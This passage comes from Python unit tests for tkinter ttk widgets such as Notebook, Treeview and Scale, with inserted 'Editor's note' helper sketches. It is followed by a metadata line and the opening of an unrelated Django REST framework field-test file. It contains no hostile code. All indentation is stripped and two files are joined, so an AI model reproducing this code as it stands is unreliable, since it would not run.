variable=myvar, value=0)
cbtn2 = ttk.Radiobutton(self.root, command=cb_test,
variable=myvar, value=1)
if self.wantobjects:
conv = lambda x: x
else:
conv = int
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(conv(cbtn['value']), myvar.get())
self.assertEqual(myvar.get(),
conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertTrue(success)
cbtn2['command'] = ''
res = cbtn2.invoke()
self.assertEqual(str(res), '')
self.assertLessEqual(len(success), 1)
self.assertEqual(conv(cbtn2['value']), myvar.get())
self.assertEqual(myvar.get(),
conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertEqual(str(cbtn['variable']), str(cbtn2['variable']))
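# Editor's note: an illustrative sketch, not part of the original test module.
# It shows the usual Radiobutton pattern implied by test_invoke above: several
# buttons share one variable and each contributes its own value. Names are
# assumptions for illustration; it relies on the module's tkinter/ttk imports.
def _sketch_build_radiogroup(parent):
    choice = tkinter.StringVar(parent, value='a')
    buttons = [ttk.Radiobutton(parent, text=text, value=value, variable=choice)
               for value, text in (('a', 'First'), ('b', 'Second'))]
    return buttons, choice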
class MenubuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'compound', 'cursor', 'direction',
'image', 'menu', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Menubutton(self.root, **kwargs)
def test_direction(self):
widget = self.create()
self.checkEnumParam(widget, 'direction',
'above', 'below', 'left', 'right', 'flush')
def test_menu(self):
widget = self.create()
menu = tkinter.Menu(widget, name='menu')
self.checkParam(widget, 'menu', menu, conv=str)
menu.destroy()
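# Editor's note: an illustrative sketch, not part of the original test module.
# It shows the Menubutton/Menu pairing that test_menu above checks only at the
# option level. The helper name and the menu entry are assumptions.
def _sketch_build_menubutton(parent):
    mb = ttk.Menubutton(parent, text='Options', direction='below')
    menu = tkinter.Menu(mb, tearoff=False)
    menu.add_command(label='Reset')
    mb['menu'] = menu
    return mb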
@add_standard_options(StandardTtkOptionsTests)
class ScaleTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'from', 'length',
'orient', 'style', 'takefocus', 'to', 'value', 'variable',
)
_conv_pixels = noconv_meth
default_orient = 'horizontal'
def setUp(self):
super(ScaleTest, self).setUp()
self.scale = self.create()
self.scale.pack()
self.scale.update()
def create(self, **kwargs):
return ttk.Scale(self.root, **kwargs)
def test_from(self):
widget = self.create()
self.checkFloatParam(widget, 'from', 100, 14.9, 15.1, conv=False)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 130, 131.2, 135.6, '5i')
def test_to(self):
widget = self.create()
self.checkFloatParam(widget, 'to', 300, 14.9, 15.1, -10, conv=False)
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 300, 14.9, 15.1, -10, conv=False)
def test_custom_event(self):
failure = [1, 1, 1] # will need to be empty
funcid = self.scale.bind('<<RangeChanged>>', lambda evt: failure.pop())
self.scale['from'] = 10
self.scale['from_'] = 10
self.scale['to'] = 3
self.assertFalse(failure)
failure = [1, 1, 1]
self.scale.configure(from_=2, to=5)
self.scale.configure(from_=0, to=-2)
self.scale.configure(to=10)
self.assertFalse(failure)
def test_get(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
scale_width = self.scale.winfo_width()
self.assertEqual(self.scale.get(scale_width, 0), self.scale['to'])
self.assertEqual(conv(self.scale.get(0, 0)), conv(self.scale['from']))
self.assertEqual(self.scale.get(), self.scale['value'])
self.scale['value'] = 30
self.assertEqual(self.scale.get(), self.scale['value'])
self.assertRaises(tkinter.TclError, self.scale.get, '', 0)
self.assertRaises(tkinter.TclError, self.scale.get, 0, '')
def test_set(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
# set restricts the max/min values according to the current range
max = conv(self.scale['to'])
new_max = max + 10
self.scale.set(new_max)
self.assertEqual(conv(self.scale.get()), max)
min = conv(self.scale['from'])
self.scale.set(min - 1)
self.assertEqual(conv(self.scale.get()), min)
        # changing the variable directly doesn't impose this limitation, though
var = tkinter.DoubleVar(self.root)
self.scale['variable'] = var
var.set(max + 5)
self.assertEqual(conv(self.scale.get()), var.get())
self.assertEqual(conv(self.scale.get()), max + 5)
del var
# the same happens with the value option
self.scale['value'] = max + 10
self.assertEqual(conv(self.scale.get()), max + 10)
self.assertEqual(conv(self.scale.get()), conv(self.scale['value']))
        # nevertheless, note that the max/min values obtained by specifying
        # x, y coords are still bounded by the current range
self.assertEqual(conv(self.scale.get(0, 0)), min)
self.assertEqual(conv(self.scale.get(self.scale.winfo_width(), 0)), max)
self.assertRaises(tkinter.TclError, self.scale.set, None)
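# Editor's note: an illustrative sketch, not part of the original test module.
# It shows a Scale bound to a DoubleVar, the combination exercised indirectly
# by test_set above. The helper name and the 0-100 range are assumptions.
def _sketch_build_scale(parent):
    value = tkinter.DoubleVar(parent, value=0.0)
    scale = ttk.Scale(parent, from_=0, to=100, orient='horizontal',
                      variable=value)
    return scale, value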
@add_standard_options(StandardTtkOptionsTests)
class ProgressbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'length',
'mode', 'maximum', 'phase',
'style', 'takefocus', 'value', 'variable',
)
_conv_pixels = noconv_meth
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Progressbar(self.root, **kwargs)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 100.1, 56.7, '2i')
def test_maximum(self):
widget = self.create()
self.checkFloatParam(widget, 'maximum', 150.2, 77.7, 0, -10, conv=False)
def test_mode(self):
widget = self.create()
self.checkEnumParam(widget, 'mode', 'determinate', 'indeterminate')
def test_phase(self):
# XXX
pass
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 150.2, 77.7, 0, -10,
conv=False)
@unittest.skipIf(sys.platform == 'darwin',
'ttk.Scrollbar is special on MacOSX')
@add_standard_options(StandardTtkOptionsTests)
class ScrollbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'orient', 'style', 'takefocus',
)
default_orient = 'vertical'
def create(self, **kwargs):
return ttk.Scrollbar(self.root, **kwargs)
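# Editor's note: an illustrative sketch, not part of the original test module.
# ScrollbarTest only checks options, so this shows the conventional two-way
# wiring between a scrollbar and a scrollable widget. Names are assumptions.
def _sketch_attach_scrollbar(parent, scrollable):
    sb = ttk.Scrollbar(parent, orient='vertical', command=scrollable.yview)
    scrollable.configure(yscrollcommand=sb.set)
    return sb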
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class NotebookTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height', 'padding', 'style', 'takefocus',
)
def setUp(self):
super(NotebookTest, self).setUp()
self.nb = self.create(padding=0)
self.child1 = ttk.Label(self.root)
self.child2 = ttk.Label(self.root)
self.nb.add(self.child1, text='a')
self.nb.add(self.child2, text='b')
def create(self, **kwargs):
return ttk.Notebook(self.root, **kwargs)
def test_tab_identifiers(self):
self.nb.forget(0)
self.nb.hide(self.child2)
self.assertRaises(tkinter.TclError, self.nb.tab, self.child1)
self.assertEqual(self.nb.index('end'), 1)
self.nb.add(self.child2)
self.assertEqual(self.nb.index('end'), 1)
self.nb.select(self.child2)
self.assertTrue(self.nb.tab('current'))
self.nb.add(self.child1, text='a')
self.nb.pack()
self.nb.wait_visibility()
if sys.platform == 'darwin':
tb_idx = "@20,5"
else:
tb_idx = "@5,5"
self.assertEqual(self.nb.tab(tb_idx), self.nb.tab('current'))
for i in range(5, 100, 5):
try:
if self.nb.tab('@%d, 5' % i, text=None) == 'a':
break
except tkinter.TclError:
pass
else:
self.fail("Tab with text 'a' not found")
def test_add_and_hidden(self):
self.assertRaises(tkinter.TclError, self.nb.hide, -1)
self.assertRaises(tkinter.TclError, self.nb.hide, 'hi')
self.assertRaises(tkinter.TclError, self.nb.hide, None)
self.assertRaises(tkinter.TclError, self.nb.add, None)
self.assertRaises(tkinter.TclError, self.nb.add, ttk.Label(self.root),
unknown='option')
tabs = self.nb.tabs()
self.nb.hide(self.child1)
self.nb.add(self.child1)
self.assertEqual(self.nb.tabs(), tabs)
child = ttk.Label(self.root)
self.nb.add(child, text='c')
tabs = self.nb.tabs()
curr = self.nb.index('current')
        # verify that the tab gets re-added at its previous position
child2_index = self.nb.index(self.child2)
self.nb.hide(self.child2)
self.nb.add(self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.assertEqual(self.nb.index(self.child2), child2_index)
self.assertEqual(str(self.child2), self.nb.tabs()[child2_index])
# but the tab next to it (not hidden) is the one selected now
self.assertEqual(self.nb.index('current'), curr + 1)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.nb.forget, -1)
self.assertRaises(tkinter.TclError, self.nb.forget, 'hi')
self.assertRaises(tkinter.TclError, self.nb.forget, None)
tabs = self.nb.tabs()
child1_index = self.nb.index(self.child1)
self.nb.forget(self.child1)
self.assertNotIn(str(self.child1), self.nb.tabs())
self.assertEqual(len(tabs) - 1, len(self.nb.tabs()))
self.nb.add(self.child1)
self.assertEqual(self.nb.index(self.child1), 1)
self.assertNotEqual(child1_index, self.nb.index(self.child1))
def test_index(self):
self.assertRaises(tkinter.TclError, self.nb.index, -1)
self.assertRaises(tkinter.TclError, self.nb.index, None)
self.assertIsInstance(self.nb.index('end'), int)
self.assertEqual(self.nb.index(self.child1), 0)
self.assertEqual(self.nb.index(self.child2), 1)
self.assertEqual(self.nb.index('end'), 2)
def test_insert(self):
# moving tabs
tabs = self.nb.tabs()
self.nb.insert(1, tabs[0])
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert(self.child1, self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert('end', self.child1)
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert('end', 0)
self.assertEqual(self.nb.tabs(), tabs)
# bad moves
self.assertRaises(tkinter.TclError, self.nb.insert, 2, tabs[0])
self.assertRaises(tkinter.TclError, self.nb.insert, -1, tabs[0])
# new tab
child3 = ttk.Label(self.root)
self.nb.insert(1, child3)
self.assertEqual(self.nb.tabs(), (tabs[0], str(child3), tabs[1]))
self.nb.forget(child3)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert(self.child1, child3)
self.assertEqual(self.nb.tabs(), (str(child3), ) + tabs)
self.nb.forget(child3)
self.assertRaises(tkinter.TclError, self.nb.insert, 2, child3)
self.assertRaises(tkinter.TclError, self.nb.insert, -1, child3)
# bad inserts
self.assertRaises(tkinter.TclError, self.nb.insert, 'end', None)
self.assertRaises(tkinter.TclError, self.nb.insert, None, 0)
self.assertRaises(tkinter.TclError, self.nb.insert, None, None)
def test_select(self):
self.nb.pack()
self.nb.wait_visibility()
success = []
tab_changed = []
self.child1.bind('<Unmap>', lambda evt: success.append(True))
self.nb.bind('<<NotebookTabChanged>>',
lambda evt: tab_changed.append(True))
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.select(self.child2)
self.assertTrue(success)
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.update()
self.assertTrue(tab_changed)
def test_tab(self):
self.assertRaises(tkinter.TclError, self.nb.tab, -1)
self.assertRaises(tkinter.TclError, self.nb.tab, 'notab')
self.assertRaises(tkinter.TclError, self.nb.tab, None)
self.assertIsInstance(self.nb.tab(self.child1), dict)
self.assertEqual(self.nb.tab(self.child1, text=None), 'a')
# newer form for querying a single option
self.assertEqual(self.nb.tab(self.child1, 'text'), 'a')
self.nb.tab(self.child1, text='abc')
self.assertEqual(self.nb.tab(self.child1, text=None), 'abc')
self.assertEqual(self.nb.tab(self.child1, 'text'), 'abc')
def test_tabs(self):
self.assertEqual(len(self.nb.tabs()), 2)
self.nb.forget(self.child1)
self.nb.forget(self.child2)
self.assertEqual(self.nb.tabs(), ())
def test_traversal(self):
self.nb.pack()
self.nb.wait_visibility()
self.nb.select(0)
simulate_mouse_click(self.nb, 5, 5)
self.nb.focus_force()
self.nb.event_generate('<Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.tab(self.child1, text='a', underline=0)
self.nb.enable_traversal()
self.nb.focus_force()
simulate_mouse_click(self.nb, 5, 5)
if sys.platform == 'darwin':
self.nb.event_generate('<Option-a>')
else:
self.nb.event_generate('<Alt-a>')
self.assertEqual(self.nb.select(), str(self.child1))
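# Editor's note: an illustrative sketch, not part of the original test module.
# It condenses the Notebook usage covered above: tabs are added with text and
# an underline index, and enable_traversal() turns on the keyboard bindings
# that test_traversal simulates. Names are assumptions for illustration.
def _sketch_build_notebook(parent):
    nb = ttk.Notebook(parent)
    nb.add(ttk.Frame(nb), text='First', underline=0)
    nb.add(ttk.Frame(nb), text='Second', underline=0)
    nb.enable_traversal()  # Control-Tab / Alt+<underlined letter> switching
    return nb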
@add_standard_options(StandardTtkOptionsTests)
class TreeviewTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'columns', 'cursor', 'displaycolumns',
'height', 'padding', 'selectmode', 'show',
'style', 'takefocus', 'xscrollcommand', 'yscrollcommand',
)
def setUp(self):
super(TreeviewTest, self).setUp()
self.tv = self.create(padding=0)
def create(self, **kwargs):
return ttk.Treeview(self.root, **kwargs)
def test_columns(self):
widget = self.create()
self.checkParam(widget, 'columns', 'a b c',
expected=('a', 'b', 'c'))
self.checkParam(widget, 'columns', ('a', 'b', 'c'))
self.checkParam(widget, 'columns', () if tcl_version < (8, 5) else '')
def test_displaycolumns(self):
widget = self.create()
widget['columns'] = ('a', 'b', 'c')
self.checkParam(widget, 'displaycolumns', 'b a c',
expected=('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', ('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', '#all',
expected=('#all',))
self.checkParam(widget, 'displaycolumns', (2, 1, 0))
self.checkInvalidParam(widget, 'displaycolumns', ('a', 'b', 'd'),
errmsg='Invalid column index d')
self.checkInvalidParam(widget, 'displaycolumns', (1, 2, 3),
errmsg='Column index 3 out of bounds')
self.checkInvalidParam(widget, 'displaycolumns', (1, -2),
errmsg='Column index -2 out of bounds')
def test_height(self):
widget = self.create()
self.checkPixelsParam(widget, 'height', 100, -100, 0, '3c', conv=False)
self.checkPixelsParam(widget, 'height', 101.2, 102.6, conv=noconv)
def test_selectmode(self):
widget = self.create()
self.checkEnumParam(widget, 'selectmode',
'none', 'browse', 'extended')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', 'tree headings',
expected=('tree', 'headings'))
self.checkParam(widget, 'show', ('tree', 'headings'))
self.checkParam(widget, 'show', ('headings', 'tree'))
self.checkParam(widget, 'show', 'tree', expected=('tree',))
self.checkParam(widget, 'show', 'headings', expected=('headings',))
def test_bbox(self):
self.tv.pack()
self.assertEqual(self.tv.bbox(''), '')
self.tv.wait_visibility()
self.tv.update()
item_id = self.tv.insert('', 'end')
children = self.tv.get_children()
self.assertTrue(children)
bbox = self.tv.bbox(children[0])
self.assertIsBoundingBox(bbox)
# compare width in bboxes
self.tv['columns'] = ['test']
self.tv.column('test', width=50)
bbox_column0 = self.tv.bbox(children[0], 0)
root_width = self.tv.column('#0', width=None)
if not self.wantobjects:
root_width = int(root_width)
self.assertEqual(bbox_column0[0], bbox[0] + root_width)
# verify that bbox of a closed item is the empty string
child1 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.bbox(child1), '')
def test_children(self):
# no children yet, should get an empty tuple
self.assertEqual(self.tv.get_children(), ())
item_id = self.tv.insert('', 'end')
self.assertIsInstance(self.tv.get_children(), tuple)
self.assertEqual(self.tv.get_children()[0], item_id)
# add item_id and child3 as children of child2
child2 = self.tv.insert('', 'end')
child3 = self.tv.insert('', 'end')
self.tv.set_children(child2, item_id, child3)
self.assertEqual(self.tv.get_children(child2), (item_id, child3))
        # child3 has child2 as parent, so trying to set child2 as a child
        # of child3 should result in an error
self.assertRaises(tkinter.TclError,
self.tv.set_children, child3, child2)
# remove child2 children
self.tv.set_children(child2)
self.assertEqual(self.tv.get_children(child2), ())
# remove root's children
self.tv.set_children('')
self.assertEqual(self.tv.get_children(), ())
def test_column(self):
# return a dict with all options/values
self.assertIsInstance(self.tv.column('#0'), dict)
# return a single value of the given option
if self.wantobjects:
self.assertIsInstance(self.tv.column('#0', width=None), int)
# set a new value for an option
self.tv.column('#0', width=10)
# testing new way to get option value
self.assertEqual(self.tv.column('#0', 'width'),
10 if self.wantobjects else '10')
self.assertEqual(self.tv.column('#0', width=None),
10 if self.wantobjects else '10')
# check read-only option
self.assertRaises(tkinter.TclError, self.tv.column, '#0', id='X')
self.assertRaises(tkinter.TclError, self.tv.column, 'invalid')
invalid_kws = [
{'unknown_option': 'some value'}, {'stretch': 'wrong'},
{'anchor': 'wrong'}, {'width': 'wrong'}, {'minwidth': 'wrong'}
]
for kw in invalid_kws:
self.assertRaises(tkinter.TclError, self.tv.column, '#0',
**kw)
def test_delete(self):
self.assertRaises(tkinter.TclError, self.tv.delete, '#0')
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
self.tv.delete(item_id)
self.assertFalse(self.tv.get_children())
# reattach should fail
self.assertRaises(tkinter.TclError,
self.tv.reattach, item_id, '', 'end')
# test multiple item delete
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
self.assertEqual(self.tv.get_children(), (item1, item2))
self.tv.delete(item1, item2)
self.assertFalse(self.tv.get_children())
def test_detach_reattach(self):
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
# calling detach without items is valid, although it does nothing
prev = self.tv.get_children()
self.tv.detach() # this should do nothing
self.assertEqual(prev, self.tv.get_children())
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
# detach item with children
self.tv.detach(item_id)
self.assertFalse(self.tv.get_children())
# reattach item with children
self.tv.reattach(item_id, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
        # move a child to the root
self.tv.move(item2, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, item2))
self.assertEqual(self.tv.get_children(item_id), ())
# bad values
self.assertRaises(tkinter.TclError,
self.tv.reattach, 'nonexistent', '', 'end')
self.assertRaises(tkinter.TclError,
self.tv.detach, 'nonexistent')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, 'otherparent', 'end')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, '', 'invalid')
# multiple detach
self.tv.detach(item_id, item2)
self.assertEqual(self.tv.get_children(), ())
self.assertEqual(self.tv.get_children(item_id), ())
def test_exists(self):
self.assertEqual(self.tv.exists('something'), False)
self.assertEqual(self.tv.exists(''), True)
self.assertEqual(self.tv.exists({}), False)
# the following will make a tk.call equivalent to
# tk.call(treeview, "exists") which should result in an error
# in the tcl interpreter since tk requires an item.
self.assertRaises(tkinter.TclError, self.tv.exists, None)
def test_focus(self):
# nothing is focused right now
self.assertEqual(self.tv.focus(), '')
item1 = self.tv.insert('', 'end')
self.tv.focus(item1)
self.assertEqual(self.tv.focus(), item1)
self.tv.delete(item1)
self.assertEqual(self.tv.focus(), '')
        # try focusing a nonexistent item
self.assertRaises(tkinter.TclError, self.tv.focus, 'hi')
def test_heading(self):
# check a dict is returned
self.assertIsInstance(self.tv.heading('#0'), dict)
# check a value is returned
self.tv.heading('#0', text='hi')
self.assertEqual(self.tv.heading('#0', 'text'), 'hi')
self.assertEqual(self.tv.heading('#0', text=None), 'hi')
# invalid option
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
background=None)
# invalid value
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
anchor=1)
def test_heading_callback(self):
def simulate_heading_click(x, y):
simulate_mouse_click(self.tv, x, y)
self.tv.update()
success = [] # no success for now
self.tv.pack()
self.tv.wait_visibility()
self.tv.heading('#0', command=lambda: success.append(True))
self.tv.column('#0', width=100)
self.tv.update()
# assuming that the coords (5, 5) fall into heading #0
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
success = []
commands = self.tv.master._tclCommands
self.tv.heading('#0', command=str(self.tv.heading('#0', command=None)))
self.assertEqual(commands, self.tv.master._tclCommands)
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
# XXX The following raises an error in a tcl interpreter, but not in
# Python
#self.tv.heading('#0', command='I dont exist')
#simulate_heading_click(5, 5)
def test_index(self):
# item 'what' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.index, 'what')
self.assertEqual(self.tv.index(''), 0)
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
c1 = self.tv.insert(item1, 'end')
c2 = self.tv.insert(item1, 'end')
self.assertEqual(self.tv.index(item1), 0)
self.assertEqual(self.tv.index(c1), 0)
self.assertEqual(self.tv.index(c2), 1)
self.assertEqual(self.tv.index(item2), 1)
self.tv.move(item2, '', 0)
self.assertEqual(self.tv.index(item2), 0)
self.assertEqual(self.tv.index(item1), 1)
# check that index still works even after its parent and siblings
# have been detached
self.tv.detach(item1)
self.assertEqual(self.tv.index(c2), 1)
self.tv.detach(c1)
self.assertEqual(self.tv.index(c2), 0)
# but it fails after item has been deleted
self.tv.delete(item1)
self.assertRaises(tkinter.TclError, self.tv.index, c2)
def test_insert_item(self):
# parent 'none' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.insert, 'none', 'end')
# open values
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='please')
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=True)))
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=False)))
# invalid index
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'middle')
# trying to duplicate item id is invalid
itemid = self.tv.insert('', 'end', 'first-item')
self.assertEqual(itemid, 'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
MockTclObj('first-item'))
# unicode values
value = u'\xe1ba'
item = self.tv.insert('', 'end', values=(value, ))
self.assertEqual(self.tv.item(item, 'values'),
(value,) if self.wantobjects else value)
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.tv.item(item, values=self.root.splitlist(self.tv.item(item, values=None)))
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.assertIsInstance(self.tv.item(item), dict)
# erase item values
self.tv.item(item, values='')
self.assertFalse(self.tv.item(item, values=None))
# item tags
item = self.tv.insert('', 'end', tags=[1, 2, value])
self.assertEqual(self.tv.item(item, tags=None),
('1', '2', value) if self.wantobjects else
'1 2 %s' % value)
self.tv.item(item, tags=[])
self.assertFalse(self.tv.item(item, tags=None))
self.tv.item(item, tags=(1, 2))
self.assertEqual(self.tv.item(item, tags=None),
('1', '2') if self.wantobjects else '1 2')
# values with spaces
item = self.tv.insert('', 'end', values=('a b c',
'%s %s' % (value, value)))
self.assertEqual(self.tv.item(item, values=None),
('a b c', '%s %s' % (value, value)) if self.wantobjects else
'{a b c} {%s %s}' % (value, value))
# text
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text="Label here"), text=None),
"Label here")
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text=value), text=None),
value)
def test_set(self):
self.tv['columns'] = ['A', 'B']
item = self.tv.insert('', 'end', values=['a', 'b'])
self.assertEqual(self.tv.set(item), {'A': 'a', 'B': 'b'})
self.tv.set(item, 'B', 'a')
self.assertEqual(self.tv.item(item, values=None),
('a', 'a') if self.wantobjects else 'a a')
self.tv['columns'] = ['B']
self.assertEqual(self.tv.set(item), {'B': 'a'})
self.tv.set(item, 'B', 'b')
self.assertEqual(self.tv.set(item, column='B'), 'b')
self.assertEqual(self.tv.item(item, values=None),
('b', 'a') if self.wantobjects else 'b a')
self.tv.set(item, 'B', 123)
self.assertEqual(self.tv.set(item, 'B'),
123 if self.wantobjects else '123')
self.assertEqual(self.tv.item(item, values=None),
(123, 'a') if self.wantobjects else '123 a')
self.assertEqual(self.tv.set(item),
{'B': 123} if self.wantobjects else {'B': '123'})
        # nonexistent column
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A')
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A', 'b')
        # nonexistent item
self.assertRaises(tkinter.TclError, self.tv.set, 'notme')
def test_tag_bind(self):
events = []
item1 = self.tv.insert('', 'end', tags=['call'])
item2 = self.tv.insert('', 'end', tags=['call'])
self.tv.tag_bind('call', '<ButtonPress-1>',
lambda evt: events.append(1))
self.tv.tag_bind('call', '<ButtonRelease-1>',
lambda evt: events.append(2))
self.tv.pack()
self.tv.wait_visibility()
self.tv.update()
pos_y = set()
found = set()
for i in range(0, 100, 10):
if len(found) == 2: # item1 and item2 already found
break
item_id = self.tv.identify_row(i)
if item_id and item_id not in found:
pos_y.add(i)
found.add(item_id)
self.assertEqual(len(pos_y), 2) # item1 and item2 y pos
for y in pos_y:
simulate_mouse_click(self.tv, 0, y)
# by now there should be 4 things in the events list, since each
# item had a bind for two events that were simulated above
self.assertEqual(len(events), 4)
for evt in zip(events[::2], events[1::2]):
self.assertEqual(evt, (1, 2))
def test_tag_configure(self):
# Just testing parameter passing for now
self.assertRaises(TypeError, self.tv.tag_configure)
self.assertRaises(tkinter.TclError, self.tv.tag_configure,
'test', sky='blue')
self.tv.tag_configure('test', foreground='blue')
self.assertEqual(str(self.tv.tag_configure('test', 'foreground')),
'blue')
self.assertEqual(str(self.tv.tag_configure('test', foreground=None)),
'blue')
self.assertIsInstance(self.tv.tag_configure('test'), dict)
def test_tag_has(self):
item1 = self.tv.insert('', 'end', text='Item 1', tags=['tag1'])
item2 = self.tv.insert('', 'end', text='Item 2', tags=['tag2'])
self.assertRaises(TypeError, self.tv.tag_has)
self.assertRaises(TclError, self.tv.tag_has, 'tag1', 'non-existing')
self.assertTrue(self.tv.tag_has('tag1', item1))
self.assertFalse(self.tv.tag_has('tag1', item2))
self.assertFalse(self.tv.tag_has('tag2', item1))
self.assertTrue(self.tv.tag_has('tag2', item2))
self.assertFalse(self.tv.tag_has('tag3', item1))
self.assertFalse(self.tv.tag_has('tag3', item2))
self.assertEqual(self.tv.tag_has('tag1'), (item1,))
self.assertEqual(self.tv.tag_has('tag2'), (item2,))
self.assertEqual(self.tv.tag_has('tag3'), ())
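# Editor's note: an illustrative sketch, not part of the original test module.
# It gathers the Treeview pieces the tests above exercise one by one: extra
# columns, headings and nested items. Column names and values are assumptions.
def _sketch_build_treeview(parent):
    tv = ttk.Treeview(parent, columns=('size',), show='tree headings')
    tv.heading('#0', text='Name')
    tv.heading('size', text='Size')
    folder = tv.insert('', 'end', text='docs', open=True)
    tv.insert(folder, 'end', text='readme.txt', values=('1 KB',))
    return tv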
@add_standard_options(StandardTtkOptionsTests)
class SeparatorTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'style', 'takefocus',
# 'state'?
)
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Separator(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class SizegripTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'style', 'takefocus',
# 'state'?
)
def create(self, **kwargs):
return ttk.Sizegrip(self.root, **kwargs)
tests_gui = (
ButtonTest, CheckbuttonTest, ComboboxTest, EntryTest,
FrameTest, LabelFrameTest, LabelTest, MenubuttonTest,
NotebookTest, PanedWindowTest, ProgressbarTest,
RadiobuttonTest, ScaleTest, ScrollbarTest, SeparatorTest,
SizegripTest, TreeviewTest, WidgetTest,
)
if __name__ == "__main__":
run_unittest(*tests_gui)
| gpl-3.0 |
hsfzxjy/wisecitymbc | site_packages/rest_framework/tests/test_fields.py | 2 | 36085 | """
General serializer field tests.
"""
from __future__ import unicode_literals
import datetime
from decimal import Decimal
from uuid import uuid4
from django.core import validators
from django.db import models
from django.test import TestCase
from django.utils.datastructures import SortedDict
from rest_framework import serializers
from rest_framework.tests.models import RESTFrameworkModel
class TimestampedModel(models.Model):
added = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class CharPrimaryKeyModel(models.Model):
id = models.CharField(max_length=20, primary_key=True)
class TimestampedModelSerializer(serializers.ModelSerializer):
class Meta:
model = TimestampedModel
class CharPrimaryKeyModelSerializer(serializers.ModelSerializer):
class Meta:
model = CharPrimaryKeyModel
class TimeFieldModel(models.Model):
clock = models.TimeField()
class TimeFieldModelSerializer(serializers.ModelSerializer):
class Meta:
model = TimeFieldModel
SAMPLE_CHOICES = [
('red', 'Red'),
('green', 'Green'),
('blue', 'Blue'),
]
class ChoiceFieldModel(models.Model):
choice = models.CharField(choices=SAMPLE_CHOICES, blank=True, max_length=255)
class ChoiceFieldModelSerializer(serializers.ModelSerializer):
class Meta:
model = ChoiceFieldModel
class ChoiceFieldModelWithNull(models.Model):
choice = models.CharField(choices=SAMPLE_CHOICES, blank=True, null=True, max_length=255)
class ChoiceFieldModelWithNullSerializer(serializers.ModelSerializer):
class Meta:
model = ChoiceFieldModelWithNull
class BasicFieldTests(TestCase):
def test_auto_now_fields_read_only(self):
"""
auto_now and auto_now_add fields should be read_only by default.
"""
serializer = TimestampedModelSerializer()
